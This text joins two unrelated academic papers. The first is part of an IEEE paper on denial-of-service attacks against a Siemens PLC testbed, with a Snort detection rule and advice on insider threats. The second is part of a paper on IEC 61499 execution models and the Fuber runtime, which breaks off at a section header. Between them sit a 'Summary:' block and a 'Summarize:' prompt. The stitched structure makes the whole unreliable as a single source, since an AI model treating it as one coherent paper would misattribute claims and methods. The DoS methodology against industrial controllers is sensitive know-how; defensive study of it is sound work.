- Using communication protocols developed for commercial purposes, in which security is not considered at all or only rarely handled [5].
ICS are responsible for controlling and monitoring many critical infrastructures. For this reason, security vulnerabilities in ICS cause these systems, and the entire infrastructure under their control, to become potential targets for attackers.
If attackers deactivate these systems, this may result not only in economic harm but also in citizens being deprived of important services in their lives [6]. Thus, it is crucial to analyze in depth and reveal the existing vulnerabilities of the components (PLC, HMI, RTU, MTU, etc.) and the protocols (ModBUS, Profinet, DNP3, etc.) used in ICS [7]. Only then will it be possible to take precautions against these vulnerabilities and prevent them from being exploited again by attackers [8-10]. Vulnerabilities in ICS can allow intruders to infiltrate the network, gain access to control software, and, by changing the operating conditions of the system, cause undesired major damage. DoS attacks are the types of attacks that are eventually noticed by the victims. However, it is important to detect these attacks as soon as possible, without hampering the use of services or creating a flood impact [11]. While DoS attacks often seem less dangerous than other attacks, in some cases they can become more dangerous for ICS and for the critical infrastructures these systems manage. For example, by preventing the gate of a dam from closing in an emergency, or by disabling the systems that control temperature, such as in nuclear power plants, a denial of service attack can lead to major disasters. ICS are an integral component of the production and control process. The management of the majority of modern infrastructures is based on these systems. However, when they are evaluated in terms of cyber security, it is seen that PLCs, which are important components of ICS, operate in an architecture open to external networks and especially to Internet-based constructions. Despite the security breaches in ICS, until recently there has not been enough interest and study in the scientific community on the security of PLC-managed automation systems.
Only after the detection of the Stuxnet malware in 2010 did research to identify security vulnerabilities in PLC-based systems begin to attract the interest of PLC suppliers and users. Subsequent malware findings such as DuQu, Flame/sKyWIper, Night Dragon, Shamoon, Havex and Sandworm/BlackEnergy 2 also indicate an increasing tendency toward critical infrastructure attacks.
2018 6th International Istanbul Smart Grids and Cities Congress and Fair (ICSG)
Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11, 2025 at 16:38:37 UTC from IEEE Xplore. Restrictions apply.
Despite these events, security awareness of ICS environments is still not a top priority in many institutions [12], because the security objectives for ICS prioritize accessibility, integrity and confidentiality, in that order [13,14]. In this context, a test environment (testbed) was established to determine how the security precautions of the PLC, a significant component of ICS, can be bypassed by exploiting the security vulnerabilities of hybrid ICS protocols (Profinet-TCP/IP, etc.). In the test environment, the vulnerabilities of PLCs were evaluated through Denial of Service (DoS) attacks. Subsequently, the attack packets were captured and analyzed in order to obtain the patterns of the attacks. Furthermore, the importance of managing privileged accounts against cyber attacks on ICS and the effects of insiders holding these accounts are discussed. In this respect, the aim is to rescue ICS from attacks with minimal damage and to prevent similar attacks. Some of the studies on the security of ICS have focused on analysis based on simulation systems [14-17]. The weakest point of studies based on simulation systems is the difficulty of accurately projecting the real system and the possibility that the analyses may not give the same results on the real system.
Another part of the studies carried out within the scope of ICS security focuses on confidentiality [18,19]. The solutions proposed there are usually based on cryptographic techniques. However, given the fact that today's ICS networks cover hundreds of installations with millions of pieces of equipment, the difficulty of implementing these solutions in practice can be better understood.
II. TESTBED
In the majority of research on the security of ICS, no implementation has been done on a real system. Thus, this study focuses on detecting the vulnerabilities of the PLC device and the TIA Portal application, and on identifying solution proposals, by carrying out security analysis on a testbed involving a real control system.
Figure 1. DoS attack reconnaissance, attack and detection steps for PLCs
As shown in Fig. 1, the analysis of the DoS attack carried out on the PLC and the TIA Portal application consists of three phases. In the first phase, attacks were carried out and their effects on the system were evaluated. The second phase is the observation phase, which is based on the analysis of the packets captured as a result of the attacks. In the last phase, the aim was to create attack-related patterns via intrusion detection systems for detecting similar attacks. The testbed consisted of one S7-1200 (firmware 2.2) PLC, one management computer on which remote command and control of the PLC was performed with the TIA Portal management software, and a personal computer with the Kali Linux operating system for implementing the attacks. A separate computer with SmoothSec installed was used to detect the attacks. DoS attacks were carried out on the PLC and the TIA Portal application in the network topology shown in Fig. 2 by using the Hping, SmoothSec IDS and Wireshark tools.
Figure 2. Testbed network topology
III. DENIAL OF SERVICE ATTACK (DOS)
One of the important threats to ICS is the Denial of Service attack.
The aim of a Denial of Service attack is to block the system's access to authorized resources or to prevent these resources from being used in their intended manner [20,21].
Figure 3. DoS attack reconnaissance, attack and detection phases
In the analysis of the attack, the Denial of Service attack was carried out first, and the changes in the system were examined. Subsequently, the rule sets created by analyzing the captured attack packets according to the phases indicated in Fig. 3 were entered into the Snort-based library. Detecting attacks, the ultimate goal, was achieved through these rules. PLC protocols respond to all query packets from any IP/MAC address or node, and this is another important vulnerability in PLCs. It was determined that a DoS attack can be carried out successfully even from a different network as long as the IP address of the target is known, because a DoS attack is a directly IP-oriented attack. Any port scanning tool such as Nmap can be used to detect the IP address of a PLC. In this respect, the DoS attack was directed at the PROFINET port (102), which is mostly used by PLC devices for network communication. The Hping program was used for the DoS attack and, as long as the attack continued, the ping response time of the PLC device increased considerably. When the DoS attack was stopped, the ping response time measured 1212 ms, as shown in Fig. 4.
Figure 4. DoS attack effects on PLC
The DoS attack was also carried out against the TIA Portal on the control computer. As long as the attack continued, the ping response time increased from about 2 ms to 5280 ms. Additionally, all of the control buttons of the TIA Portal became inactive and the PLC could not be controlled via the TIA Portal, as shown in Fig.
5.
Figure 5. TIA Portal management screen after DoS attack
The DoS attack packets directed at the PLC were detected as medium-severity spam, as shown in Fig. 6.
Figure 6. Event packets detected after DoS attack
Although the attack was carried out with only a few attacker computers, the network was rendered ineffective. According to the delay standard IEEE 1646-2004 for substation automation communication, high-speed messages must be transmitted within 2 ms to 10 ms [22]. In this context, considering the PLC's need for instant reaction, the latency that a DoS attack introduces into the network traffic of control systems may lead to significant problems. It is easy to detect the attacker's IP address when a DoS attack is carried out from a single source. However, it is more difficult to detect DoS attacks launched from different IP addresses using IP spoofing. Thus, attackers use IP spoofing to hide their IP addresses and use bogon IP addresses, as in the attack scenario handled in this paper (Fig. 7).
Figure 7. Source IP addresses of DDoS attack packets
When the rule information of a listed event shown in Fig. 6 is examined, it can be seen that the event packets are the distributed denial of service (DDoS) attack packets described in Fig. 8.
Figure 8. The signature acquired after DoS attack
IV. ANALYSIS RESULT
In the vulnerability analysis, DoS attacks were carried out on the PLC, one of the most important components of ICS, and the results indicated that PLCs are vulnerable to these attacks. The detection phase of the attack analysis showed that the precautions needed against possible attacks can be taken by monitoring the PLC communication traffic continuously.
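A detection rule of the kind entered into the Snort-based library might look like the following. This is an illustrative sketch, not the rule set actually acquired in the experiment: the threshold values and SID are arbitrary, and $HOME_NET is assumed to cover the PLC segment.

```
alert tcp any any -> $HOME_NET 102 (msg:"Possible SYN flood against PLC ISO-TSAP/PROFINET port"; \
    flags:S; detection_filter:track by_src, count 70, seconds 10; \
    classtype:attempted-dos; sid:1000001; rev:1;)
```

The `detection_filter` keeps the rule quiet for legitimate reconnects and fires only when one source exceeds the SYN rate, which matches the flood pattern observed in the testbed.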
Although signature-based prevention systems (antivirus, IPS, etc.) are believed to have great success against known cyber attacks, they are not effective enough against the new malicious payloads emerging every second, especially zero-day vulnerabilities. For this reason, adjusting network traffic norms and thresholds through continuous monitoring makes it possible to build attack patterns for alerting network administrators and security experts. Thus, it becomes possible to prevent malicious packets from infiltrating and harming the system, while ensuring that legitimate packets are not delayed or blocked, in keeping with the continuity requirement of ICS. When the phases of the attacks in the testbed are examined, it is clear that knowledge of the network topology and identification of the target are vital factors for implementing successful attacks. However, in the event that the attacker is an insider within the organization and has privileged authorization over ICS systems, the success rate and destructive effects of the attack will increase. For this reason, it is very important to monitor the operations performed by employees with privileged authorization on ICS and to regulate their authority.
V. INSIDERS EFFECTS AND SOLUTION SUGGESTIONS
Some studies investigating the causes of information security threats suggest that careless or malicious personnel with access authorization are more hazardous and destructive than hackers, malicious software and faulty hardware [23,24]. Other studies estimate that the abuse of privileged accounts is a high risk during insider attacks and that such attacks will increase in the coming period [25,26]. Such risks are also prevalent for ICS, and if the necessary security measures are not taken against insider threats, the effects for ICS will be much more devastating.
This is because the detection and prevention of an attack will be very difficult when an insider has knowledge of the network topology and components of the ICS. Protection from insider attacks requires specific solutions. However, when organizations' cyber security solutions are examined, it appears that most of them focus on external threats [27]. Security solutions for internal and external threats should not be considered separately; on the contrary, they should be implemented in an integrated manner [28]. In order to prevent internal threats, not only technological solutions but also human factors should be evaluated. In addition to ordinary user accounts, ICS also have administrator accounts owned by IT staff with privileged authorization within the system. These accounts are mostly used for the management, maintenance and repair of systems. One of the paths attackers take toward their ultimate goal is the privileged accounts and passwords used in the system. The seizure of one of these accounts' passwords by attackers can lead to the whole system being compromised. The Maroochy Water Services breach, one of the insider attacks on ICS, resulted from the fact that the user account of a dismissed employee was not removed from the authorized accounts [29]. The Ukrainian power grid attack also stemmed from careless and untrained users: attackers obtained privileged accounts from these users, causing about 225,000 people to be affected. Stuxnet is one of the best-known targeted attacks carried out on ICS. Although it is not known exactly how this attack was conducted, the majority of researchers think that the attackers had help from an insider in carrying out such a complicated attack. The main reason for this opinion is that the target ICS had an air-gapped structure isolated from the outside [30].
The control and management of privileged accounts, one of the most important factors in ICS attacks, is an important information security issue that needs to be assessed. Many measures and procedures have been proposed by researchers to solve this problem. Although the objectives of the proposed solutions are the same, they involve different approaches [31-34]. A control mechanism should be developed, on the basis of the issues discussed above, to prevent the exploitation of privileged accounts during insider attacks. The developed control mechanism should involve:
- Preventing unauthorized access to components of the ICS,
- Increasing ICS resistance to password attacks,
- Training staff and raising their awareness of cyber security,
- Regulating access control to ICS components,
- Keeping logs to follow up the transactions performed by authorized personnel,
- Clearly defining the limits of responsibility within the ICS,
- Ensuring that organizational managers are included in the IT security process.
Figure 9. The position of the control mechanism within ICS
The control mechanism to be established in accordance with the specified points should run integrated with the ICS. The control mechanism must be located between the ICS and the authorized personnel as an additional security layer for accessing the components of the ICS infrastructure (Fig. 9).
VI. CONCLUSION
Many critical infrastructures managed by ICS do not have adequate security assessment against cyber attacks. These critical systems can face many threats unless the security vulnerabilities of the ICS are determined and the necessary measures are taken to overcome them.
In this context, critical ICS components need to be monitored in real time so that ICS, which significantly affect our social lives, can survive potential cyber threats with minimal damage and can be reactivated as soon as possible. As a result of the analysis, it has been seen that detection-based solutions, including continuous quality monitoring and behavior-based testing, are more effective than prevention-based security measures, given the new malware emerging every second. Furthermore, organizations with critical infrastructure should develop and implement a control mechanism for staff with privileged authority over the ICS and for other employees in order to prevent insider attacks. The operations on the ICS of all employees who could become insiders should be monitored and recorded. It should not be forgotten that attacks aimed at ICS may be carried out not only from outside but also by trusted staff with privileged accounts.
REFERENCES
[1] H. Farhangi, "The path of the smart grid," IEEE Power and Energy Magazine, vol. 8, no. 1, pp. 18-28, Dec. 2010.
[2] P. Motta Pires and L. H. G. Oliveira, "Security Aspects of SCADA and Corporate Network Interconnection: An Overview," in Proc. 2006 Int. Conf. on Dependability of Computer Systems, pp. 127-134.
[3] V. M. Igure, S. A. Laughter, and R. D. Williams, "Security issues in SCADA networks," Computers & Security, vol. 25, no. 7, pp. 498-506, Oct. 2006.
[4] M. Hentea, "Improving Security for SCADA Control Systems," Interdisciplinary Journal of Information, Knowledge, and Management, vol. 3, pp. 073-086, 2008.
[5] S. Rautmare, "SCADA system security: Challenges and recommendations," in Proc. 2011 Annual IEEE India Conf., pp. 1-4.
[6] S. Clements and H. Kirkham, "Cyber-security considerations for the smart grid," in Proc. 2010 IEEE PES General Meeting, pp. 1-5.
[7] R. E. Johnson, "Survey of SCADA security challenges and potential attack vectors," in Proc. 2010 Int. Conf. for Internet Technology and Secured Transactions, pp. 1-5.
[8] A. Nicholson, S. Webber, S. Dyer, T. Patel, and H. Janicke, "SCADA security in the light of Cyber-Warfare," Comput. Secur., vol. 31, no. 4, pp. 418-436, June 2012.
[9] G. P. H. Sandaruwan, P. S. Ranaweera, and V. A. Oleshchuk, "PLC security and critical infrastructure protection," in Proc. 2013 IEEE 8th Int. Conf. on Industrial and Information Systems, pp. 81-85.
[10] M. Jensen, C. Sel, U. Franke, H. Holm, and L. Nordström, "Availability of a SCADA/OMS/DMS system - A case study," in Proc. 2010 IEEE PES Innovative Smart Grid Technologies Conf. Europe, pp. 1-8.
[11] T. Peng, C. Leckie, and K. Ramamohanarao, "Survey of network-based defense mechanisms countering the DoS and DDoS problems," ACM Comput. Surv., vol. 39, no. 1, pp. 1-42, Apr. 2007, Art. no. 3.
[12] E. Byres, "Defense-In-Depth: Reliable Security To Thwart Cyber-Attacks," Pipeline & Gas Journal, vol. 241, no. 2, Feb. 2014.
[13] D. Kushner, "The real story of stuxnet," IEEE Spectrum, vol. 50, no. 3, pp. 48-53, Mar. 2013.
[14] E. Byres, D. Hoffman, and N. Kube, "On Shaky Ground - A Study of Security Vulnerabilities in Control Protocols," in Proc. 2006 5th Int. Topical Meeting on Nuclear Plant Instrumentation, Controls, and Human Machine Interface Technology, vol. 1, pp. 782-788.
[15] A. Giani, G. Karsai, T. Roosta, A. Shah, B. Sinopoli, and J. Wiley, "A testbed for secure and robust SCADA systems," SIGBED Rev., vol. 5, no. 2, pp. 1-4, July 2008.
[16] B. Genge, F. Graur, and P. Haller, "Experimental assessment of network design approaches for protecting industrial control systems," Int. Journal of Critical Infrastructure Protection, vol. 11, pp. 24-38, Dec. 2015.
[17] N. Sayegh, A. Chehab, I. H. Elhajj, and A. Kayssi, "Internal security attacks on SCADA systems," in Proc. 2013 3rd Int. Conf. on Communications and Information Technology, pp. 22-27.
[18] H. Li, R. Mao, L. Lai, and R. C. Qiu, "Compressed Meter Reading for Delay-Sensitive and Secure Load Report in Smart Grid," in Proc.
2010 First IEEE Int. Conf. on Smart Grid Communications, pp. 114-119.
[19] E. Shi, A. Perrig, and L. V. Doorn, "BIND: a fine-grained attestation service for secure distributed systems," in Proc. 2005 IEEE Symposium on Security and Privacy, pp. 154-168.
[20] A. Silberschatz, P. B. Galvin, and G. Gagne, "Security," in Operating System Concepts, 9th ed., Hoboken, NJ: John Wiley & Sons, 2013, pp. 673-674.
[21] P. Varalakshmi and S. T. Selvi, "Thwarting DDoS attacks in grid using information divergence," Future Generation Computer Systems, vol. 29, no. 1, pp. 429-441, Jan. 2013.
[22] K. C. Budka, J. G. Deshpande, T. L. Doumi, M. Madden, and T. Mew, "Communication network architecture and design principles for smart grids," Bell Lab. Tech. J., vol. 15, no. 2, pp. 205-227, Sep. 2010.
[23] J. Shropshire, M. Warkentin, and S. Sharma, "Personality, attitudes, and intentions: Predicting initial adoption of information security behavior," Computers & Security, vol. 49, pp. 177-191, Mar. 2015.
[24] M. Leitner and S. Rinderle-Ma, "A systematic review on security in Process-Aware Information Systems - Constitution, challenges, and future directions," Inf. Softw. Technol., vol. 56, no. 3, pp. 273-293, Mar. 2014.
[25] R. Pilling, "Global threats, cyber-security nightmares and how to protect against them," Computer Fraud & Security, vol. 2013, no. 9, pp. 14-18, Sep. 2013.
[26] W. R. Claycomb, C. L. Huth, L. Flynn, D. M. McIntire, and T. B. Lewellen, "Chronological Examination of Insider Threat Sabotage: Preliminary Observations," Journal of Wireless Mobile Networks, Ubiquitous Computing, and Dependable Applications (JoWUA), vol. 3, no. 4, pp. 4-20, Dec. 2012.
[27] T. El Maliki and J.-M. Seigneur, "A Survey of User-centric Identity Management Technologies," in Proc. 2007 Int. Conf. Emerging Security Information, Systems, and Technologies, pp. 12-17.
[28] S. De Capitani di Vimercati, S. Paraboschi, and P.
Samarati, "Access control: principles and solutions," Software: Practice and Experience, vol. 33, no. 5, pp. 397-421, Apr. 2003.
[29] J. Slay and M. Miller, "Lessons Learned from the Maroochy Water Breach," in Critical Infrastructure Protection, Boston, MA: Springer, 2008, pp. 73-82.
[30] R. M. Lee and M. J. Assante. (2015, Oct. 15). The Industrial Control System Cyber Kill Chain. SANS Institute. [Online]. Available: https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297
[31] K. Padayachee, "An assessment of opportunity-reducing techniques in information security: An insider threat perspective," Decision Support Systems, vol. 92, pp. 47-56, Dec. 2016.
[32] N. Baracaldo and J. Joshi, "An adaptive risk management and access control framework to mitigate insider threats," Computers & Security, vol. 39, pp. 237-254, Nov. 2013.
[33] I. Agrafiotis, J. R. C. Nurse, O. Buckley, P. Legg, S. Creese, and M. Goldsmith, "Identifying attack patterns for insider threat detection," Computer Fraud & Security, vol. 2015, no. 7, pp. 9-17, July 2015.
[34] Y. L. Wang and S. C. Yang, "A Method of Evaluation for Insider Threat," in Proc. 2014 Int. Symposium on Computer, Consumer and Control, pp. 438-441.
Summary:
Industrial Control Systems (ICS) are vital for countries' smart grids and critical infrastructures. In addition to advantages such as the control and monitoring of geographically distributed structures and increased productivity and efficiency, ICS have brought some security problems. Specific solutions need to be produced for these security issues. The most important information security component for ICS is availability, and the most devastating threat to this component is the Denial of Service (DoS) attack. For this reason, DoS attacks carried out on Programmable Logic Controllers (PLCs), an important component of ICS, are analyzed in the paper. In the test environment where the attack scenarios were implemented, real PLC devices were used in order to obtain the most accurate results. The destructive effects of insiders, particularly in bypassing system security measures and in the discovery phase of cyber attacks against ICS, are also emphasized in the paper.
|
Summarize:
I. INTRODUCTION
Manufacturing systems and process control systems are typically controlled by a distributed control system. Developing distributed manufacturing and process control systems is time-consuming and error-prone because the environment is typically heterogeneous, consisting of hardware from multiple vendors, which often implies that different languages and development tools are used to develop the software control functions. Industrial control systems generally have high requirements on reliability and timing constraints of the control functions. Thus the control software is typically written in special purpose languages defined in the standard IEC 61131 [1], [2] and executed on special purpose hardware called Programmable Logic Controllers (PLCs). However, IEC 61131 has only very rudimentary support for developing distributed control applications. For general purpose computers a number of standards for developing distributed systems have emerged, most notably CORBA [3], DCOM [4], and SOAP [5]. CORBA and SOAP are vendor-independent techniques, while DCOM relies on services offered by Microsoft Windows. Technically these standards may be used for distributed control systems as well, if the hardware were to support them. However, due to their size and the complexity of implementing them, they are unsuitable for use by PLC programmers, who typically also have limited hardware resources. For industrial control systems two existing standards are in use.
Manufacturing Message Specification (MMS) [6] has been a standard since 1988 and defines how the value of one variable in a PLC may be read and written from another PLC. OPC [7] relies on DCOM for transportation of data between computers and is thus relying on Microsoft technologies, which might be a problem in heterogeneous environments. In 2005 the International Electrotechnical Commission (IEC) approved a standard for distributed function blocks (FBs), IEC 61499 [8]-[10], that extends the existing standard IEC 61131 to facilitate the development of distributed control systems. A number of development environments for IEC 61499 have emerged, including FBDK [11], CORFU [12], Torero [13] and ISaGRAF [14]. There are also IEC 61499 runtime environments which focus on real-time execution of FB applications, RTSJ-AXE [15] and RTAI-AXE [16]. Current research on the IEC 61499 standard has focused on architectures for building control applications [17]-[20], verification of applications [21]-[23], and performance analysis of runtime environments [24]. The IEC 61499 standard has standardized how a single function block should be executed, but not an execution model for function block networks. This paper analyzes the consequences of not having a standardized execution model for function block networks. We show how the same application, when executing in two different standard-compliant runtime environments, may have different logical behavior and potentially harm humans or equipment that are interacting with the control system. Thus, moving an application from one runtime environment to another might require a rewrite of the entire application, or a part of it, for correct behavior of the control system. A well defined execution model is therefore necessary both for being able to build reusable software components and for being able to verify the behavior of the control application. The choice of execution model also has consequences for the performance of the runtime environment.
To the authors' best knowledge, the importance of the function block network execution model for the behavior of IEC 61499 applications has not been published before. In this paper a new runtime environment is also introduced, Fuber [25]. A formal execution model is defined for Fuber, making its behavior deterministic, and thus predictable, and possible to analyze using existing tools for formal verification and synthesis. A translation of an IEC 61499 application running inside Fuber to a set of interacting state automata is presented. The behavior may then be analyzed in standard tools for supervisor verification and synthesis, e.g. Supremica [26]. The automata models may also be used for synthesis of scheduling functions so that a given behavior specification is satisfied. The paper is organized as follows. In Section II the terminology of the IEC 61499 standard is introduced. This is followed by an analysis of different execution models in Section III that shows the importance of a well defined execution environment. In Section IV, a new execution runtime is presented. In Sections V and VI the models for two different runtime environments, of which one is Fuber, are presented. The paper is ended with the conclusion.
1-4244-0681-1/06/$20.00 ©2006 IEEE
II. IEC 61499 BASICS
In this section the basic terminology from the IEC 61499 standard is introduced. The architecture is based on functional software units called function blocks, where the basic function block type is the basic entity. In Fig. 1(a) the anatomy of a basic function block type is presented. The basic function block executes algorithms based on the arriving events and generates new events that are passed on when the algorithms finish execution. The algorithms use data associated with incoming events to update internal variables and produce output data.
When an algorithm has terminated, an output event is generated, triggering another function block for execution. The Execution Control Chart (ECC), of which an example can be seen in Fig. 1(b), determines which algorithm to execute based on the current input event and the values of input, output, and internal variables. When a state is entered, each action associated with the state is executed once, and the ECC stays in the state until a condition for entering another state is fulfilled. The conditions upon which transitions occur are boolean expressions involving input events and input, output, and local variables. A special case of a transition condition is one labeled with "1", which means that it is always true and is taken as soon as all actions of a state are executed. Basic function blocks are connected together by event and data connections into function block applications. For an example of a complete application see Fig. 3. The applications can be executed using a runtime environment that implements the execution model defined by the standard. It is however important to note that the standard does not define in which order the function blocks should be executed. In the next section we show with a simple example how this may have large consequences for the logical behavior of the control system.
III. ANALYSIS OF EXECUTION MODEL
In this section the importance of a well defined execution environment is shown. First, a simple example is introduced and different block scheduling orders are discussed. Second, how to handle events that occur close to each other in time is discussed. Finally a conclusion about the execution model is presented.
A. Block Scheduling Order
To show the importance of different block execution orders a simple example is used, see Fig. 2. A requirement for the control system is that the OpenClamp algorithm is executed before the PushOut algorithm. A straightforward implementation of the control for this example using IEC 61499 is shown in Fig. 3.
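The ECC dispatch semantics described in Section II can be sketched as a tiny interpreter. This is an illustrative sketch only, not code from any IEC 61499 runtime; the class and dictionary layout are assumptions made for clarity, while the state, event, and algorithm names follow the example ECC of Fig. 1(b).

```python
# Minimal sketch of IEC 61499 ECC dispatch (illustrative, not normative).
# Each state carries an action (algorithm to run, output event to emit);
# transitions are guarded by an input event name or by "1" (always true).
class ECC:
    def __init__(self, initial, transitions, actions):
        self.state = initial
        self.transitions = transitions   # {(state, guard): next_state}
        self.actions = actions           # {state: (algorithm, output_event)}
        self.emitted = []                # output events generated so far

    def fire(self, event):
        """Deliver one input event, run state actions, then keep following
        any always-true '1' transitions until none remain."""
        nxt = self.transitions.get((self.state, event))
        if nxt is None:
            return  # this event triggers no transition in the current state
        while nxt is not None:
            self.state = nxt
            algorithm, out_event = self.actions.get(nxt, (None, None))
            if algorithm:
                algorithm()
            if out_event:
                self.emitted.append(out_event)
            nxt = self.transitions.get((self.state, "1"))

# The ECC of Fig. 1(b): STATE0 --EI--> STATE1 runs ALGORITHM, emits EO,
# then returns to STATE0 on the always-true "1" transition.
log = []
ecc = ECC(
    initial="STATE0",
    transitions={("STATE0", "EI"): "STATE1", ("STATE1", "1"): "STATE0"},
    actions={"STATE1": (lambda: log.append("ALGORITHM"), "EO")},
)
ecc.fire("EI")
print(ecc.state, ecc.emitted, log)  # STATE0 ['EO'] ['ALGORITHM']
```

Note how the "1" transition is resolved inside the same invocation, matching the description above that it is taken as soon as all actions of a state have executed.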
When the control application is run, the only block ready to execute is restart. Execution of restart generates the output event COLD, which is an input event to split. As a consequence, output events EO1 and EO2 are generated in split. At this point both carriage and fixture receive input events.
Fig. 1. (a) Anatomy of a basic function block. The left side of the block contains the event and data inputs while the right side contains the event and data outputs. The basic function block contains an execution control chart (ECC) and a set of algorithms. The ECC determines which algorithm to execute. (b) An example of an execution control chart (ECC). This ECC states that if it is in STATE0 and input event EI is received, the ECC transfers to state STATE1 and schedules the algorithm named ALGORITHM for execution. After ALGORITHM has terminated the output event EO is generated, and the ECC returns immediately to state STATE0 since the transition condition is 1 (true).
Fig. 2. The example contains a fixture for holding a workpiece and an automatic carriage. The workpiece is processed in the fixture. After processing, the carriage is brought to the fixture as the clamp is opened. When the carriage is in place the workpiece is pushed out and falls into the carriage. The carriage transports the workpiece to a buffer.
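What happens next depends on the order in which the runtime delivers fixture's two input events. A minimal sketch of the two possibilities follows; the dispatch function is hypothetical, while the block, event, and algorithm names are taken from the example of Figs. 2 and 3.

```python
# Hypothetical sketch of the scheduling hazard: fixture receives EI1
# (triggering OpenClamp) and EI2 (triggering PushOut), and the standard
# permits either delivery order.
def run_fixture(delivery_order):
    """Execute fixture's algorithms in the given event delivery order."""
    handlers = {"EI1": "OpenClamp", "EI2": "PushOut"}
    return [handlers[event] for event in delivery_order]

safe = run_fixture(["EI1", "EI2"])    # clamp opened before push-out
unsafe = run_fixture(["EI2", "EI1"])  # push-out against a closed clamp
print(safe)    # ['OpenClamp', 'PushOut']
print(unsafe)  # ['PushOut', 'OpenClamp']
```

Both orders are standard-compliant, yet only the first satisfies the stated requirement that OpenClamp run before PushOut.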
Here the standard does not define whether carriage should be executed before fixture or the other way around. The standard also allows carriage and fixture to execute concurrently. Assume that carriage executes, resulting in another input event to fixture. Now the only block ready to execute is fixture. According to the standard it is possible for fixture to execute EI1 before EI2 or vice versa. Note that if EI1 is executed first then the OpenClamp algorithm is executed before the PushOut algorithm, but if EI2 is executed before EI1 then PushOut is executed before OpenClamp, possibly resulting in destroyed equipment. Thus, the same standard-compliant application executing within two standard-compliant runtime environments may result in very different behaviors. It is possible to argue that, given the specified requirements, the application should have been implemented in a different way. However, that is beside the point. Eventually, this subtle problem will arise when the application is moved from one runtime environment to another.
Fig. 3. At the top, the function blocks used for control of the application presented in Fig. 2 are shown. At the bottom of the figure, the execution control charts of the function blocks are shown.
B. Contiguous Events
Events that occur close to each other in time are common in reactive and distributed control systems; hence it is desirable that a standard is explicit on how these contiguous events are handled. This section presents what the standard states about contiguous events and how that is implemented in some available runtime environments.
Two different cases of contiguous events are discussed: multiple events on different event inputs and multiple events on the same event input. The two cases deal with events arriving simultaneously, or almost simultaneously, at the event inputs of the same function block, for example one event arriving at the function block when the block's ECC is busy executing an algorithm triggered by the previous event. In the standard [8] the behavior of the ECC is defined in section 5.2.2.2. It is stated that all operations from the invocation of the ECC (which is activated by the arrival of an event at an event input) until there are no more ECC transitions that can be taken should be implemented as a critical region. Our interpretation of this statement is that events arriving while the ECC is busy should not be discarded; instead they should be saved in a queue for later handling. It might be possible to instead interpret this so that arriving events are discarded while the ECC is busy. The latter interpretation could have advantages in real-time systems but can lead to undesired behavior in some applications, for instance the example presented later in this section. Furthermore, as the standard was interpreted, the event queue does not necessarily have to be a first-in-first-out queue. How the queue is implemented may also have important consequences for the behavior of an application, possibly resulting in undesired behavior. To investigate further how contiguous events are handled in different runtime environments, an example function block application was used. The application tests the two cases of contiguous events in two available runtime environments: the Fuber runtime environment, presented later in this paper, and ISaGRAF 5.0 [14], the first commercially available IEC 61499 runtime and development environment.
Fuber is designed from the ground up to be an IEC 61499 runtime environment, while ISaGRAF appears to be an implementation of IEC 61499 on top of an existing scan-cycle based IEC 61131 runtime.
Fig. 4. a) Example application producing simultaneous events. b) ECC for the standard event function block E_MERGE.
The example application is shown in Fig. 4a. Two E_CYCLE blocks produce events which go to the merge block at the same time. Events generated by the merge block then go into a counter block which simply counts the number of arriving events. The ECC for the standard E_MERGE function block type is shown in Fig. 4b. Running the application for x seconds, the counter should count 2x events. When the application is executed in Fuber the counter counts 2x events, while in the scan-cycle based ISaGRAF runtime the counter only counts x events. This means that every other event has been lost. The problem with the scan-cycle based runtime is that multiple events on different event inputs are not detected by the merge block, and when the ECC is executed for one event the other event is discarded. Hence ISaGRAF has not interpreted, or at least not implemented, the standard the same way as we have, possibly due to the scan-cycle based strategy. This particular problem could however be solved by making a new merge block with a different ECC which distinguishes between the case when one event arrives on either event input and the case when an event arrives on both event inputs simultaneously. In the second case the new merge block sends out two output events. Using this solution for the merge block, the problem then moves to the counter function block, which now does not detect the two events arriving almost simultaneously at the same event input.
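The lost-event behavior just described can be sketched by contrasting the two handling strategies. The functions below are assumed semantics for illustration, not vendor code: a queue-based runtime saves every arriving event for later delivery, while a single-flag, scan-cycle runtime latches only "an event arrived" per input and so collapses two simultaneous events into one ECC invocation.

```python
from collections import deque

def queue_based(cycles):
    """Each cycle, both E_CYCLE blocks emit an event; every event is
    enqueued and later delivered, so the counter sees all of them."""
    queue = deque()
    counter = 0
    for _ in range(cycles):
        queue.append("EI1")   # event from cycle1
        queue.append("EI2")   # event from cycle2
        while queue:
            queue.popleft()
            counter += 1      # merge forwards each queued event
    return counter

def scan_cycle(cycles):
    """Each scan, input events are latched as booleans; two events
    arriving in the same scan trigger only one ECC pass."""
    counter = 0
    for _ in range(cycles):
        ei1_flag, ei2_flag = True, True   # both events arrive this scan
        if ei1_flag or ei2_flag:          # one pass handles "the" event
            counter += 1                  # the second event is lost
    return counter

x = 5
print(queue_based(x), scan_cycle(x))  # 10 5 -> 2x versus x events counted
```

This mirrors the observed 2x versus x counter values for the two runtimes.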
The solution to the contiguous events problem then requires adjustments to the underlying runtime implementation so that simultaneously arriving events on an event input are correctly reported to the ECC. Neither of the cases of contiguous events is a problem when function block applications are executed in the Fuber runtime environment, since all incoming events are reported to the ECC.
C. Conclusion about the Execution Model
Due to the possible incompatibility between runtime environments presented above, a developer writing IEC 61499 control applications has to be extremely careful if portability between runtime environments is important. To achieve true "write once, execute on every IEC 61499 runtime environment" portability it is necessary to standardize on a single, or possibly a small number of, application execution models (as opposed to function block execution models). Also, in those cases where portability is not interesting, it is important to have a well defined execution model in order to be able to analyze the behavior of the application using available tools for formal verification. Driven by interest in formal verification of IEC 61499 applications, a new IEC 61499 runtime environment with a well defined, and thus analyzable, execution model has been implemented. In the next section this new runtime environment, called Fuber, is presented.
IV. FUBER
Fuber (FUnction Block Execution Runtime) is developed in Java under an open source license and the complete source code is available at [25]. Fuber is able to open many IEC 61499 compliant applications and execute them.
Unlike most other runtime environments, Fuber does not compile the algorithms before execution; instead the algorithms are interpreted using BeanShell [27], which makes it possible to update the behavior of an application during execution, a feature that might be useful for debugging and high-availability applications.
A. Current Limitations
